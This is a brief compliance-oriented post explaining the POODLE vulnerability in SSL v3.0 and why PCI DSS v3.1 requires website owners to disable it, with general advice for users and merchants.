Why is POODLE and SSL v3 a problem?
As I’m sure you already know, PCI DSS v3.1 introduces a single change to replace “SSL” with “strong cryptography” in section 4.x.
Whilst it might be a single change in PCI DSS, it literally means hundreds of thousands of HTTPS web pages around the world need their underlying web servers reconfiguring to use strong encryption.
Why change – what’s the risk?
The POODLE vulnerability means I can sit in an Internet cafe and listen in on any HTTPS sessions that are currently connecting to SSL v3.0 servers.
What can users do about it?
If you use HTTPS pages, or indeed HTTP pages, on insecure networks, then there is always a risk that someone can intercept your data. We recommend using a VPN, so that people around you cannot sniff your traffic.
What can website owners do about it?
Disable SSL v3.0 completely. Whether you like it or not. This is serious stuff, and if you carry on using v3.0, then people sat on insecure networks using your website, could potentially lose all the information they’re sending you to criminals.
What’s actually happening?
Website owners aren’t disabling it quick enough. Either they’re not aware of the problem, or they are and do not want to affect users of older browsers (<Internet Explorer 6.0) from doing business with them.
What will QSAs do is they discover POODLE on your system?
You will fail your audit, as the POODLE vulnerability is a critical vulnerability more than 30 days old. POODLE on a payment page has pretty obvious consequences.